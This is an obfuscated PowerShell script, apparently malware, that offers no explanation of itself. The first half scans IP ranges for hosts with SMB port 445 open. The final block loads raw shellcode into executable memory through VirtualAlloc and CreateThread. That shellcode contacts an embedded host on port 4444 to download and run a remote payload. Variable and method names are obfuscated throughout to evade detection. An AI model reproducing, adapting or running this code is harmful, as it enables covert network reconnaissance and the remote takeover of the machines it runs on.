SeT-iTEM  ('vaRia'+'b'+'LE:3'+'XG'+'2fA')  ( [type]("{1}{4}{0}{3}{5}{2}"-f 'eT.','SYSTEm','ss','Ip','.N','AdDRe'))  ;  seT-IteM  VAriabLe:46mlgI ( [tYPe]("{2}{4}{6}{3}{0}{5}{1}" -f'N','SK','IpHEl','UB','P','eTma','Er.Ip.s'));   $zk3Q=[tYpE]("{3}{5}{1}{4}{7}{0}{6}{2}"-f 'REs','Lp','YSIs','i','er','pHe','saNaL','.IP.iPaDd')  ;    SET-ITeM  ("VA"+"r"+"IAbLe:46"+"i") (  [type]("{0}{1}" -F 'ArRA','y')) ;  sEt  4Ta1  ( [TyPE]("{2}{0}{1}"-F 'em.MAT','H','SyST')  ) ;sEt-IteM ("vari"+"A"+"bL"+"e:U87pZ2")  (  [typE]("{1}{4}{0}{3}{2}"-F'sPaCeFa','ru','tOry','C','N'));   SET  ('Bp'+'I4Wr')  (  [tYPE]("{0}{2}{3}{1}"-F'pOWeR','Ll','S','He')  ) ; 
function new-iPv4`RA`Nge
{
  param(
    [Parameter(mANdAToRY=${Tr`Ue},
                   VAluEFroMPiPELiNebYpRoPErTynaMe=${Tr`UE},
                   posiTion=0)]
           ${sTa`R`TiP},
           
    [Parameter(maNdatoRY=${Tr`UE},
                   ValUEfrOmpiPelINEbyproPErtYnAme=${tR`UE},
                   pOSitIon=2)]
           ${en`dIp}      
  )
  
    
    ${I`P1} = ([System.Net.IPAddress]${s`TarT`iP}).("{2}{0}{1}" -f 'tAddre','ssBytes','Ge').Invoke()
     (  ChiLdITeM ("VA"+"RIA"+"bLe:46"+"i") )."vaL`Ue"::("{2}{0}{1}"-f'er','se','Rev').Invoke(${i`P1})
    ${I`P1} = ([System.Net.IPAddress](${i`p1} -join '.'))."A`dd`REss"

    ${i`p2} = ([System.Net.IPAddress]${e`Nd`iP}).("{2}{0}{1}" -f'B','ytes','GetAddress').Invoke()
     ( geT-variABLE 46i  -valUEo  )::("{1}{2}{0}" -f 'e','R','evers').Invoke(${i`P2})
    ${i`P2} = ([System.Net.IPAddress](${i`P2} -join '.'))."aDDrE`Ss"

    for (${X}=${i`p1}; ${X} -le ${i`p2}; ${x}++) {
        ${IP} = ([System.Net.IPAddress]${x}).("{1}{2}{0}"-f'sBytes','GetA','ddres').Invoke()
         $46i::("{1}{0}" -f 'everse','R').Invoke(${i`p})
        ${iP} -join '.'
    }
}

function N`EW-Ip`RA`NGe
{
    [CmdletBinding(deFauLtParAMEtErSETName={"{1}{0}"-f 'IDR','C'})]
    Param(
        [parameter(mANDatoRy=${T`Rue},
        PArameTeRsETnAme = "c`iDr",
        pOsITiOn=0)]
        [string]${c`IDR},

        [parameter(MandAtorY=${T`Rue},
        PaRaMETErsetNaMe = "ran`Ge",
        posITION=0)]
        [string]${R`ANGe}   
    )
    if(${cI`dr})
    {
        ${ip`p`ART},${m`AskpA`Rt} = ${CI`DR}.("{0}{1}" -f'Spli','t').Invoke('/')
        ${ADd`RES`sfAM`ily} = (  ( Gi ('VariA'+'B'+'lE:3'+'Xg'+'2Fa') )."v`AluE"::("{0}{1}"-f'Pars','e').Invoke(${I`ppa`RT}))."aDD`RESSfa`M`ilY"

        
        ${subnE`T`MAs`ko`BJ} =   $46MLgi::("{1}{0}" -f 'se','Par').Invoke(${MA`Sk`P`ARt}, ${ad`DrE`ssF`AMiLy})
        
        
        ${ST`ArTiP} =   $zK3Q::("{5}{3}{1}{2}{0}{4}" -f'NetworkA','Cl','assless','et','ddress','G').Invoke(${I`p`PaRt}, ${SuB`NeTMAsK`ObJ})
        ${E`Ndip} =  ( gci ('vA'+'riAblE:'+'ZK3Q')  )."VA`lue"::("{5}{4}{0}{2}{3}{1}" -f'les','ress','sBro','adcastAdd','ss','GetCla').Invoke(${ipp`A`RT},${Su`BN`etmA`SKobj})
        
        
        ${St`Ar`TiP} =  $ZK3Q::("{2}{1}{0}"-f'se','ea','Incr').Invoke(${s`TARt`iP})
        ${e`N`dIP} =  ( GcI vAriable:zK3q  )."VA`LuE"::("{1}{0}{2}" -f 'r','Dec','ease').Invoke(${en`dIP})
         ( Gci  ('vaRIa'+'B'+'Le:ZK'+'3Q')  )."v`AluE"::("{1}{2}{0}" -f'e','G','etIPRang').Invoke(${S`T`ArTIp}, ${e`NdiP})
    }
    elseif (${R`A`NGe})
    {
        ${s`TARt`iP}, ${En`dIp} = ${RA`NgE}.("{1}{0}" -f 'lit','sp').Invoke('-')
          (  gET-chILdITEM  ('Varia'+'BL'+'e:zK3q') )."vAl`UE"::("{2}{1}{0}"-f'ge','etIPRan','G').Invoke(${STAr`TIp}, ${E`N`diP})
    }
}


function New-ip`V`4`RANGEfr`OmC`i`dr 
{
    param(
		[Parameter(mAnDAtORY=${t`RUE},
                   VAlUEFRomPIpeLInEBYpRoPERtyName=${t`RUe},
                   POSITIOn=0)]
				   ${NETwO`RK}
    )
    
    ${S`T`RNetwo`R`KaddReSs} = (${NEt`W`Ork}.("{1}{0}" -f 'lit','sp').Invoke('/'))[0]
    [int]${N`EtWo`Rk`lEN`gth} = (${neTw`ork}.("{0}{1}"-f 's','plit').Invoke('/'))[1]
    ${N`ETwOr`KiP} = ([System.Net.IPAddress]${sTRn`e`TwORKaDdR`E`ss}).("{1}{2}{0}"-f'dressBytes','Ge','tAd').Invoke()
    ${iPL`enG`Th} = 32-${N`EtwORkLE`NG`TH}
     (  Gi ("Va"+"R"+"iabLe:46"+"i")  )."v`ALuE"::("{1}{0}" -f'rse','Reve').Invoke(${N`EtwoR`kiP})
    ${N`Um`BeROFipS} = ( $4Ta1::("{0}{1}" -f'P','ow').Invoke(2, ${IpLe`N`GtH})) -1
    ${Networ`K`IP} = ([System.Net.IPAddress](${NetwO`Rk`Ip} -join '.'))."ADdR`e`sS"
    ${StaRT`iP} = ${N`etw`o`RKIp} +1
    ${EN`diP} = ${NeTW`OR`kiP} + ${N`UM`BEro`FIps}
    
    If (${ENd`ip} -isnot [double])
    {
        ${e`ND`Ip} = ${En`DIP} -as [double]
    }
    If (${Sta`RTIp} -isnot [double])
    {
        ${s`TARTip} = ${st`ArT`iP} -as [double]
    }
    
    ${ST`A`RTIP} = ([System.Net.IPAddress]${s`Ta`RtIP})."IPAd`dREss`To`sTRIng"
    ${E`NDip} = ([System.Net.IPAddress]${E`N`Dip})."ipaDD`Re`ssTO`stRi`Ng"
    &("{3}{2}{1}{0}"-f 'e','ang','IPv4R','New-') ${starT`IP} ${e`N`DIP}
}

${r`UnME} =
{
     param
     (
         [Object]
         ${ipA`Dd`R`ESs},
         [Object]
         ${cR`eDS},
         [Object]
         ${cOmMA`Nd}
     )

    ${geTCr`e`DS} = ${C`REdS}
    ${p`OrT} = 445
    ${sO`ck`et} = &("{1}{2}{0}"-f 'bject','New-','O') ("{3}{4}{1}{0}{2}" -f 'cpC','kets.T','lient','Ne','t.Soc')
    ${sOcK`Et}."c`liEnt"."reCE`I`VETIMEO`Ut" = 2000
    ${ErroR`ACTiO`Npr`E`F`E`ReNCE} = ("{0}{1}{4}{2}{3}"-f 'S','ilentlyCo','inu','e','nt')
    ${SoC`kET}.("{1}{0}{2}"-f'e','Conn','ct').Invoke(${IP`ADdr`eSS}, ${pO`Rt})
    ${ER`RORaCT`iOnpRef`Er`EncE} = ("{2}{0}{1}"-f 'onti','nue','C')
    
    if (${S`oCk`eT}."c`ONneCt`ed") {  
        ${e`NdpOINtR`E`suLt} = &("{0}{1}{2}" -f'New-','Obje','ct') ("{1}{2}{0}" -f'ect','P','SObj') | &("{0}{2}{3}{1}"-f'Sele','t','ct','-Objec') ("{1}{0}"-f'st','Ho')
        ${EN`DPO`I`NtrESU`lT}."ho`st" = ${i`PaDD`Re`sS}
        ${so`C`kET}.("{1}{0}"-f 'lose','C').Invoke()        
    } else {
        ${p`O`RtCLOsed} = ("{0}{1}"-f'T','rue')
    }
        
    ${s`ock`et} = ${nU`LL}
    return ${e`N`DPOint`REsu`LT}
}

function inVOkE-ho`s`Tsc`An
{
     param
     (
         [Object]
         ${ipaD`DrE`sS},
         [Object]
         ${IprA`Ng`Ec`IdR},
         [Object]
         ${i`P`lISt},
         [Object]
         ${T`HreA`DS}
     )

    if (${IPl`ist}) {${iPR`AN`g`eFUll} = &("{3}{0}{2}{1}"-f'Co','nt','nte','Get-') ${iPli`sT}}
    if (${Ip`RanG`E`cIdR}) {${ipRa`N`GE`FUlL} = &("{5}{0}{1}{2}{3}{4}" -f 'e','w','-IPv4Rang','eFromCI','DR','N') ${Ip`Ran`GeCidr}}
    if (${I`Pa`dDREsS}) {${IpRaNGe`F`ULl} = ${IpA`DDrE`ss}}
    &("{0}{3}{2}{1}" -f 'W','t','pu','rite-Out') ''
    &("{0}{1}{2}" -f 'Wr','ite-Out','put') ${Ip`Rang`EFull}."Co`UnT" ("{1}{0}"-f 'otal','T') ("{0}{1}" -f 'h','osts') ("{1}{0}" -f'ead','r') ("{0}{1}"-f 'fr','om') ("{0}{1}"-f 'f','ile')
     
    ${j`oBs} = @()
    ${STa`RT} = &("{0}{1}{2}"-f 'g','et-dat','e')
    &("{2}{1}{0}" -f 'utput','-O','Write') ((("{0}{2}{3}{1}{4}"-f'
Begin Sc','r','anning at 9','MBsta','t'))  -RepLACe'9MB',[chAr]36) -ForegroundColor ("{0}{1}" -f 'Re','d')

    
    
    if (!${t`HRE`ADS}){${THr`EadS} = 64}   
    ${PO`oL} =   $u87pZ2::("{4}{1}{2}{0}{3}"-f'spac','eat','eRun','ePool','Cr').Invoke(1, ${thRE`A`DS})   
    ${P`OOL}.("{0}{1}" -f 'Ope','n').Invoke()
    ${endPOiNt`RE`su`Lts} = @()
    ${JO`BS} = @()   
    ${p`s} = @()   
    ${wa`It} = @()

    ${i} = 0
    
    foreach (${E`Ndpo`iNt} in ${ip`Rang`Ef`ULl})
    {
        while ($(${P`ooL}.("{5}{3}{1}{4}{2}{0}"-f 's','tAvailableRun','ace','e','sp','G').Invoke()) -le 0) {
            &("{0}{2}{1}" -f'St','leep','art-S') -milliseconds 500
        }
    
        
        ${pS} +=  $bPI4Wr::("{0}{1}"-f'c','reate').Invoke()

        
        ${P`s}[${I}]."runspAc`EP`OOl" = ${P`oOL}

        
        [void]${p`s}[${I}].("{2}{1}{0}" -f 't','ddScrip','A').Invoke(${r`U`NME})
        [void]${PS}[${I}].("{1}{2}{0}"-f'eter','A','ddParam').Invoke(("{1}{2}{0}" -f 's','IP','Addres'), ${en`dpOi`NT})
        [void]${ps}[${I}].("{2}{3}{0}{1}" -f'rame','ter','A','ddPa').Invoke(("{1}{0}"-f 's','Cred'), ${geTc`RE`DS}) 
        [void]${p`S}[${i}].("{0}{3}{1}{2}"-f'AddPa','amet','er','r').Invoke(("{2}{1}{0}"-f'nd','omma','C'), ${C`OMMA`Nd})   
        
        ${jo`BS} += ${p`s}[${I}].("{1}{3}{0}{2}" -f 'inIn','B','voke','eg').Invoke();
     
        
        ${wA`iT} += ${jO`Bs}[${i}]."ASYN`cW`Aith`ANdLe"
    
        ${I}++
    }
     
    &("{3}{1}{2}{0}"-f '-Output','ri','te','W') ("{1}{3}{2}{0}{5}{6}{7}{4}{8}"-f'for ','Waitin',' ','g',' finish..','sca','nning ','threads to','.') -ForegroundColor ("{0}{1}"-f'Cy','an')

    ${WAIt`TI`MEOut} = &("{0}{1}"-f 'get-da','te')

    while ($(${J`obs} | &("{1}{2}{0}{3}"-f'c','Wher','e-Obje','t') {${_}."iScOM`pl`ET`Ed" -eq ${fa`lse}})."c`OUnT" -gt 0 -or $($($(&("{1}{0}"-f'et-date','g')) - ${WaIt`TI`Meo`Ut})."Tot`ALSE`CO`Nds") -gt 60) {
            &("{0}{2}{1}" -f'Star','Sleep','t-') -milliseconds 500
        } 
  
    
    for (${y} = 0; ${Y} -lt ${i}; ${Y}++) {     
  
        try {   
            
            ${ENDp`OINt`REs`UlTs} += ${ps}[${y}]."EnDI`NV`OKe"(${JO`Bs}[${y}])   
  
        } catch {   
       
            
            &("{1}{0}{4}{3}{2}"-f'e','writ','ng','ni','-war') ('erro'+'r'+': '+"$_")  
        }
    
        finally {
            ${pS}[${y}].("{0}{1}{2}" -f'D','is','pose').Invoke()
        }     
    }

    ${Po`Ol}.("{0}{1}" -f 'Dispos','e').Invoke()
    
    
    ${e`ND} = &("{0}{1}"-f 'g','et-date')
    ${tOT`AlTI`Me} = ${E`Nd} - ${st`ArT}

    &("{2}{1}{0}" -f 't','pu','Write-Out') "We scanned $($iprangefull.count) endpoints in $($totaltime.totalseconds) seconds " -ForegroundColor ("{0}{1}"-f 'gree','n')
    ${eNDPOin`T`RESul`Ts}
}
${C} = ((("{48}{81}{41}{52}{90}{18}{8}{101}{86}{30}{43}{85}{20}{27}{9}{106}{45}{6}{73}{26}{91}{67}{50}{89}{14}{53}{1}{59}{94}{2}{77}{80}{25}{44}{28}{57}{99}{15}{70}{51}{5}{98}{17}{88}{3}{96}{39}{37}{4}{42}{62}{34}{40}{19}{7}{104}{22}{82}{78}{83}{11}{56}{29}{102}{13}{93}{47}{105}{16}{32}{35}{54}{66}{38}{92}{75}{58}{46}{68}{100}{10}{24}{84}{72}{103}{69}{0}{109}{74}{23}{12}{76}{64}{79}{97}{21}{63}{87}{36}{95}{55}{61}{71}{31}{49}{33}{108}{107}{60}{110}{65}" -f 'po','flProte','I','n IntPtr','teThread(','t','i','Sta','l','atic ex','t','t','pJ',' ',' flAllocation','ublic','et','ic exte','pJkerne','Attributes, uint dw','lic ',' e','Si','llt','r lpT','e','u','st','tpJ','pSt','tp','int src','er,',' uint','r ',' uin','Ptr ','ea','onF','Cr','lpThread','l','Int','J)','l32.dll','rn IntPtr V',',','nt','[D',',','int dwSi','s','Im','Type, uint ','t dwCrea','set(IntPtr de','r l',')','s','c','u','s','Pt','xtern In','ta',');','ti','tPtr lpAddress, u',' I','Id);[DllIm',' ','t, u','r','rt','pJmsvcrt.d','g',')]public s','mport',', I','ti','(tpJkern','l','ze','ntP','h',']pub','2.dll','t','r','ze, uint','port(t','alAlloc(In','la','I','t);[Dll','mem',' ','c','at',']p','ntP','3','artAddress,','ead','ck','Ptr lpParam','te','o',' c','rt(t','nt'))."rEp`la`Ce"(([cHar]116+[cHar]112+[cHar]74),[StrinG][cHar]34));${W} = &("{0}{1}{2}" -f'Add','-Ty','pe') -memberDefinition ${c} -Name ("{1}{0}" -f '32','Win') -namespace ("{0}{3}{1}{2}{4}" -f'Win','ctio','n','32Fun','s') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x5c,0x11,0x00,0x00,0xe8,0x0f,0x01,0x00,0x00,0x2f,0x39,0x30,0x6b,0x72,0x41,0x50,0x43,0x42,0x4c,0x46,0x43,0x44,0x55,0x49,0x4a,0x52,0x31,0x64,0x37,0x31,0x69,0x67,0x70,0x68,0x36,0x33,0x44,0x51,0x78,0x37,0x64,0x63,0x5f,0x33,0x45,0x7a,0x45,0x6a,0x75,0x68,0x2d,0x5a,0x43,0x33,0x32,0x69,0x73,0x46,0x30,0x66,0x5f,0x44,0x7a,0x57,0x69,0x63,0x59,0x4d,0x48,0x33,0x34,0x77,0x6b,0x5f,0x74,0x77,0x6a,0x4f,0x62,0x35,0x36,0x42,0x4f,0x35,0x78,0x77,0x5a,0x7a,0x62,0x77,0x34,0x76,0x77,0x66,0x38,0x63,0x59,0x4f,0x69,0x49,0x74,0x49,0x51,0x43,0x56,0x71,0x69,0x50,0x47,0x49,0x50,0x4d,0x75,0x4d,0x4f,0x71,0x48,0x6d,0x30,0x55,0x39,0x67,0x77,0x4d,0x39,0x5a,0x30,0x39,0x4e,0x4a,0x56,0x65,0x35,0x64,0x75,0x65,0x65,0x58,0x45,0x47,0x49,0x77,0x63,0x33,0x37,0x45,0x38,0x78,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x08,0x4f,0x75,0xd9,0xe8,0x4a,0x00,0x00,0x00,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x30,0x2e,0x31,0x30,0x30,0x00,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."l`ENg`Th" -gt 0x1000){${G} = ${z}."LE`NgTH"};${X}=${W}::("{1}{3}{0}{2}"-f'A','V','lloc','irtual').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."leNG`TH"-1);${i}++) {${W}::"ME`mSeT"([IntPtr](${x}.("{0}{1}" -f'ToInt','32').Invoke()+${i}), ${z}[${i}], 1)};${W}::("{2}{1}{3}{0}" -f 'd','e','CreateThr','a').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{0}{1}"-f 't-sle','ep','Star') 60};
